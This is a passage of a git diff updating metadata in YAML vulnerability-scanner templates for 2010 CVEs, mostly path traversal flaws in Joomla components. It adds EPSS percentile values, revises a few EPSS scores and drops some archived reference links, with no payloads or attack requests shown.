a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index c488906b3b..e5c008b4b7 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.00477 cpe: cpe:2.3:a:ternaria:com_vjdeo:1.0:*:*:*:*:*:*:* + epss-percentile: 0.72681 metadata: max-request: 1 vendor: ternaria diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index 9e9e2bcccb..c60d6e1a89 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-264 epss-score: 0.00573 cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:*:cp08:*:*:*:*:*:* + epss-percentile: 0.75122 metadata: max-request: 1 shodan-query: title:"JBoss" diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 6e58f61607..66b851ad39 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -8,7 +8,6 @@ info: reference: - https://www.exploit-db.com/exploits/12232 - https://nvd.nist.gov/vuln/detail/CVE-2010-1461 - - http://web.archive.org/web/20210518110953/https://www.securityfocus.com/bid/39504 - http://www.exploit-db.com/exploits/12232 remediation: Upgrade to a supported version. classification: @@ -18,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.00477 cpe: cpe:2.3:a:gogoritas:com_photobattle:1.0.1:*:*:*:*:*:*:* + epss-percentile: 0.72681 metadata: max-request: 1 vendor: gogoritas diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index b35273a45e..f6f72c62b6 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.00813 cpe: cpe:2.3:a:ternaria:com_jprojectmanager:1.0:*:*:*:*:*:*:* + epss-percentile: 0.79614 metadata: max-request: 1 vendor: ternaria diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index 2d405862c0..f2b0e3ea81 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.04616 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_webtv:1.0:*:*:*:*:*:*:* + epss-percentile: 0.915 metadata: max-request: 1 vendor: dev.pucit.edu.pk diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index 45fd20e8d8..0aa2c1efaa 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.05684 cpe: cpe:2.3:a:b-elektro:com_addressbook:1.5.0:*:*:*:*:*:*:* + epss-percentile: 0.92341 metadata: max-request: 1 vendor: b-elektro diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml index 2c601b7227..535d357eaa 100644 --- a/http/cves/2010/CVE-2010-1472.yaml +++ b/http/cves/2010/CVE-2010-1472.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.05684 cpe: cpe:2.3:a:kazulah:com_horoscope:1.5.0:*:*:*:*:*:*:* + epss-percentile: 0.92341 metadata: max-request: 1 vendor: kazulah diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index 83d5c8eb2c..25649c6daf 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -9,7 +9,6 @@ info: - https://www.exploit-db.com/exploits/12171 - https://nvd.nist.gov/vuln/detail/CVE-2010-1473 - http://packetstormsecurity.org/1004-exploits/joomlaeasyadbanner-lfi.txt - - http://web.archive.org/web/20140723213338/http://secunia.com/advisories/39410/ remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P @@ -18,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.00826 cpe: cpe:2.3:a:johnmccollum:com_advertising:0.25:*:*:*:*:*:*:* + epss-percentile: 0.79783 metadata: max-request: 1 vendor: johnmccollum diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index c16f307708..c1435e2dce 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.01242 cpe: cpe:2.3:a:supachai_teasakul:com_sweetykeeper:*:*:*:*:*:*:*:* + epss-percentile: 0.83796 metadata: max-request: 1 vendor: supachai_teasakul diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index 9e25e172a1..0ee5dfc572 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.01242 cpe: cpe:2.3:a:ternaria:com_preventive:1.0.5:*:*:*:*:*:*:* + epss-percentile: 0.83796 metadata: max-request: 1 vendor: ternaria diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 8dc0b6ec8b..f984bbb180 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.03527 cpe: cpe:2.3:a:alphaplug:com_alphauserpoints:1.5.5:*:*:*:*:*:*:* + epss-percentile: 0.90353 metadata: max-request: 1 vendor: alphaplug diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index c8fcbbfd39..545620e7e5 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -8,8 +8,6 @@ info: reference: - https://www.exploit-db.com/exploits/12145 - https://nvd.nist.gov/vuln/detail/CVE-2010-1478 - - http://web.archive.org/web/20140723205157/http://secunia.com/advisories/39262/ - - http://web.archive.org/web/20210121195422/https://www.securityfocus.com/bid/39390/ remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P @@ -18,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.00826 cpe: cpe:2.3:a:ternaria:com_jfeedback:1.2:*:*:*:*:*:*:* + epss-percentile: 0.79783 metadata: max-request: 1 vendor: ternaria diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index e36dccc99c..6a7f36b307 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.00477 cpe: cpe:2.3:a:mms.pipp:com_mmsblog:2.3.0:*:*:*:*:*:*:* + epss-percentile: 0.72681 metadata: max-request: 1 vendor: mms.pipp diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index 210518cbc9..4ee5643791 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.02305 cpe: cpe:2.3:a:awdsolution:com_awdwall:1.5.4:*:*:*:*:*:*:* + epss-percentile: 0.88291 metadata: max-request: 1 vendor: awdsolution diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index a8e06a82a6..f508d03731 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.04503 cpe: cpe:2.3:a:matamko:com_matamko:1.01:*:*:*:*:*:*:* + epss-percentile: 0.91406 metadata: max-request: 1 vendor: matamko diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index 32a6dbac86..f0253a9139 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.01815 cpe: cpe:2.3:a:redcomponent:com_redshop:1.0:*:*:*:*:*:*:* + epss-percentile: 0.8667 metadata: max-request: 1 vendor: redcomponent diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index 496e8df0ed..b196f3401a 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -9,7 +9,6 @@ info: - https://www.exploit-db.com/exploits/12118 - https://nvd.nist.gov/vuln/detail/CVE-2010-1532 - http://packetstormsecurity.org/1004-exploits/joomlapowermail-lfi.txt - - http://web.archive.org/web/20210127202836/https://www.securityfocus.com/bid/39348/ remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N @@ -18,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.00477 cpe: cpe:2.3:a:givesight:com_powermail:1.53:*:*:*:*:*:*:* + epss-percentile: 0.72681 metadata: max-request: 1 vendor: givesight diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index 3d96cbf44c..d920fcd682 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -8,7 +8,6 @@ info: reference: - https://www.exploit-db.com/exploits/12142 - https://nvd.nist.gov/vuln/detail/CVE-2010-1533 - - http://web.archive.org/web/20140723212810/http://secunia.com/advisories/39258/ - http://www.exploit-db.com/exploits/12142 remediation: Upgrade to a supported version. classification: @@ -18,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.00706 cpe: cpe:2.3:a:peter_hocherl:com_tweetla:1.0.1:*:*:*:*:*:*:* + epss-percentile: 0.77913 metadata: max-request: 1 vendor: peter_hocherl diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index e528940f57..7d8b130dc8 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5 cve-id: CVE-2010-1534 cwe-id: CWE-22 - epss-score: 0.02437 + epss-score: 0.01733 cpe: cpe:2.3:a:joomla.batjo:com_shoutbox:*:*:*:*:*:*:*:* + epss-percentile: 0.86312 metadata: max-request: 1 vendor: joomla.batjo diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 9d59954d04..1ff777c473 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -8,7 +8,6 @@ info: reference: - https://www.exploit-db.com/exploits/12151 - https://nvd.nist.gov/vuln/detail/CVE-2010-1535 - - http://web.archive.org/web/20140725030342/http://secunia.com/advisories/39254/ - http://www.exploit-db.com/exploits/12151 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P @@ -17,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.00706 cpe: cpe:2.3:a:peter_hocherl:com_travelbook:1.0.1:*:*:*:*:*:*:* + epss-percentile: 0.77913 metadata: max-request: 1 vendor: peter_hocherl diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index 84b63947ce..9c1d30b875 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -8,8 +8,6 @@ info: reference: - https://www.exploit-db.com/exploits/11625 - https://nvd.nist.gov/vuln/detail/CVE-2010-1540 - - http://web.archive.org/web/20140721042709/http://secunia.com/advisories/38777/ - - http://web.archive.org/web/20210121194559/https://www.securityfocus.com/bid/38530/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 @@ -17,6 +15,7 @@ info: cwe-id: CWE-22 epss-score: 0.0045 cpe: cpe:2.3:a:myblog:com_myblog:3.0.329:*:*:*:*:*:*:* + epss-percentile: 0.71928 metadata: max-request: 1 vendor: myblog diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml index bb34d34313..3f61382602 100644 --- a/http/cves/2010/CVE-2010-1586.yaml +++ b/http/cves/2010/CVE-2010-1586.yaml @@ -15,8 +15,9 @@ info: cvss-score: 4.3 cve-id: CVE-2010-1586 cwe-id: CWE-20 - epss-score: 0.00841 + epss-score: 0.00846 cpe: cpe:2.3:a:hp:system_management_homepage:2.0.0:*:*:*:*:*:*:* + epss-percentile: 0.80024 metadata: max-request: 1 vendor: hp diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index 9368434e9f..69eca79e6a 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.01299 cpe: cpe:2.3:a:joomlamart:com_jacomment:*:*:*:*:*:*:*:* + epss-percentile: 0.84165 metadata: max-request: 1 vendor: joomlamart diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index bfb5899ba6..a0e9f38a38 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.03451 cpe: cpe:2.3:a:zimbllc:com_zimbcomment:0.8.1:*:*:*:*:*:*:* + epss-percentile: 0.90259 metadata: max-request: 1 vendor: zimbllc diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index f845705a61..e38324c988 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.03451 cpe: cpe:2.3:a:zimbllc:com_zimbcore:0.1:*:*:*:*:*:*:* + epss-percentile: 0.90259 metadata: max-request: 1 vendor: zimbllc diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index 8a6311343e..de5ddacd08 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.01726 cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:* + epss-percentile: 0.8629 metadata: max-request: 1 vendor: paysyspro diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index 2d28834831..50eeb93344 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.03527 cpe: cpe:2.3:a:htmlcoderhelper:com_graphics:1.0.6:*:*:*:*:*:*:* + epss-percentile: 0.90353 metadata: max-request: 1 vendor: htmlcoderhelper diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index 035fc9455b..f2c8f58e97 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.01751 cpe: cpe:2.3:a:recly:com_smartsite:1.0.0:*:*:*:*:*:*:* + epss-percentile: 0.86395 metadata: max-request: 1 vendor: recly diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml index 79960b5666..212fb17e91 100644 --- a/http/cves/2010/CVE-2010-1658.yaml +++ b/http/cves/2010/CVE-2010-1658.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.01751 cpe: cpe:2.3:a:code-garage:com_noticeboard:1.3:*:*:*:*:*:*:* + epss-percentile: 0.86395 metadata: max-request: 1 vendor: code-garage diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index fcf1555354..358072a619 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.01806 cpe: cpe:2.3:a:webkul:com_ultimateportfolio:1.0:*:*:*:*:*:*:* + epss-percentile: 0.86644 metadata: max-request: 1 vendor: webkul diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml index dc6c25110d..2d39aef4f3 100644 --- a/http/cves/2010/CVE-2010-1714.yaml +++ b/http/cves/2010/CVE-2010-1714.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.01751 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_arcadegames:1.0:*:*:*:*:*:*:* + epss-percentile: 0.86395 metadata: max-request: 1 vendor: dev.pucit.edu.pk diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index bb94c2bbae..55e50e91be 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.01242 cpe: cpe:2.3:a:pucit.edu:com_onlineexam:1.5.0:*:*:*:*:*:*:* + epss-percentile: 0.83796 metadata: max-request: 1 vendor: pucit.edu diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index 7fba0e1949..a60fa9da2e 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.01733 cpe: cpe:2.3:a:if_surfalert_project:if_surfalert:1.2:*:*:*:*:joomla\!:*:* + epss-percentile: 0.86313 metadata: max-request: 1 framework: joomla\! diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index f1048f6958..72f57440af 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -8,8 +8,6 @@ info: reference: - https://www.exploit-db.com/exploits/12282 - https://nvd.nist.gov/vuln/detail/CVE-2010-1718 - - http://web.archive.org/web/20140805094212/http://secunia.com/advisories/39521/ - - http://web.archive.org/web/20210121195621/https://www.securityfocus.com/bid/39545/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 @@ -17,6 +15,7 @@ info: cwe-id: CWE-22 epss-score: 0.00826 cpe: cpe:2.3:a:lispeltuut:com_archeryscores:1.0.6:*:*:*:*:*:*:* + epss-percentile: 0.79783 metadata: max-request: 1 vendor: lispeltuut diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index 5eb702c332..b8b2eed9cb 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.01671 cpe: cpe:2.3:a:moto-treks:com_mtfireeagle:1.2:*:*:*:*:*:*:* + epss-percentile: 0.86069 metadata: max-request: 1 vendor: moto-treks diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index f423093ed6..e44750678d 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.01242 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_market:2.0:*:*:*:*:*:*:* + epss-percentile: 0.83796 metadata: max-request: 1 vendor: dev.pucit.edu.pk diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index 8fffaead73..7836a7fa59 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.01956 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_drawroot:1.1:*:*:*:*:*:*:* + epss-percentile: 0.87217 metadata: max-request: 1 vendor: joomlacomponent.inetlanka diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index 845055c6be..7851861622 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.01155 cpe: cpe:2.3:a:gelembjuk:com_smestorage:*:*:*:*:*:*:*:* + epss-percentile: 0.8306 metadata: max-request: 1 vendor: gelembjuk diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index c57eaff005..a36ecbf3f5 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5 cve-id: CVE-2010-1870 cwe-id: CWE-917 - epss-score: 0.03864 + epss-score: 0.04227 cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* + epss-percentile: 0.91141 metadata: max-request: 2 vendor: apache diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index 93313a230d..3808bf9a68 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2010-1875 cwe-id: CWE-22 - epss-score: 0.01724 + epss-score: 0.01222 cpe: cpe:2.3:a:com-property:com_properties:3.1.22-03:*:*:*:*:*:*:* + epss-percentile: 0.83609 metadata: max-request: 1 vendor: com-property diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index 16a6c6778b..5deb57ea92 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.00826 cpe: cpe:2.3:a:blueflyingfish.no-ip:com_orgchart:1.0.0:*:*:*:*:*:*:* + epss-percentile: 0.79783 metadata: max-request: 1 vendor: blueflyingfish.no-ip diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index 47ac9294fe..f9d06dcfb5 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.01242 cpe: cpe:2.3:a:cmstactics:com_beeheard:1.0:*:*:*:*:*:*:* + epss-percentile: 0.83796 metadata: max-request: 1 vendor: cmstactics diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index acfb3dd5c0..7d5993de55 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.05684 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multimap:1.0:*:*:*:*:*:*:* + epss-percentile: 0.92341 metadata: max-request: 1 vendor: joomlacomponent.inetlanka diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml index 4d1be5522d..26488bc163 100644 --- a/http/cves/2010/CVE-2010-1954.yaml +++ b/http/cves/2010/CVE-2010-1954.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.05684 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multiroot:1.0:*:*:*:*:*:*:* + epss-percentile: 0.92341 metadata: max-request: 1 vendor: joomlacomponent.inetlanka diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index 158a2512c2..6195fdb597 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.01671 cpe: cpe:2.3:a:thefactory:com_blogfactory:1.1.2:*:*:*:*:*:*:* + epss-percentile: 0.86069 metadata: max-request: 1 vendor: thefactory diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 96cfb215e2..3465aa8905 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.06055 cpe: cpe:2.3:a:thefactory:com_gadgetfactory:1.0.0:*:*:*:*:*:*:* + epss-percentile: 0.92545 metadata: max-request: 1 vendor: thefactory diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index ef07a880c9..87ed17ab11 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.01671 cpe: cpe:2.3:a:thefactory:com_lovefactory:1.3.4:*:*:*:*:*:*:* + epss-percentile: 0.86069 metadata: max-request: 1 vendor: thefactory diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index efbe552f45..6ced19f464 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -8,8 +8,6 @@ info: reference: - https://www.exploit-db.com/exploits/12083 - https://nvd.nist.gov/vuln/detail/CVE-2010-1977 - - http://web.archive.org/web/20210121195306/https://www.securityfocus.com/bid/39243/ - - http://web.archive.org/web/20140724201603/http://secunia.com/advisories/39356/ remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P @@ -18,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.00826 cpe: cpe:2.3:a:gohigheris:com_jwhmcs:1.5.0:*:*:*:*:*:*:* + epss-percentile: 0.79783 metadata: max-request: 1 vendor: gohigheris diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index 07670c883b..fbb218acf8 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.00826 cpe: cpe:2.3:a:affiliatefeeds:com_datafeeds:build_880:*:*:*:*:*:*:* + epss-percentile: 0.79783 metadata: max-request: 1 vendor: affiliatefeeds diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml index a4968faa69..d707f68994 100644 --- a/http/cves/2010/CVE-2010-1980.yaml +++ b/http/cves/2010/CVE-2010-1980.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.02401 cpe: cpe:2.3:a:roberto_aloi:com_joomlaflickr:1.0.3:*:*:*:*:*:*:* + epss-percentile: 0.88504 metadata: max-request: 1 vendor: roberto_aloi diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index 2dadcf4575..8246b0db64 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.00656 cpe: cpe:2.3:a:fabrikar:fabrik:2.0:*:*:*:*:joomla\!:*:* + epss-percentile: 0.76877 metadata: max-request: 1 framework: joomla\! diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index a3035e45ed..1335192d92 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -8,8 +8,6 @@ info: reference: - https://www.exploit-db.com/exploits/12121 - https://nvd.nist.gov/vuln/detail/CVE-2010-1982 - - http://web.archive.org/web/20140723233933/http://secunia.com/advisories/39202/ - - http://web.archive.org/web/20210121195400/https://www.securityfocus.com/bid/39343/ remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N @@ -18,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.00477 cpe: cpe:2.3:a:joomlart:com_javoice:2.0:*:*:*:*:*:*:* + epss-percentile: 0.72681 metadata: max-request: 1 vendor: joomlart diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index 4f76e50da3..0a026a15ca 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.01815 cpe: cpe:2.3:a:redcomponent:com_redtwitter:1.0b8:*:*:*:*:*:*:* + epss-percentile: 0.8667 metadata: max-request: 1 vendor: redcomponent diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index b885207246..d67c1bbacd 100644 --- 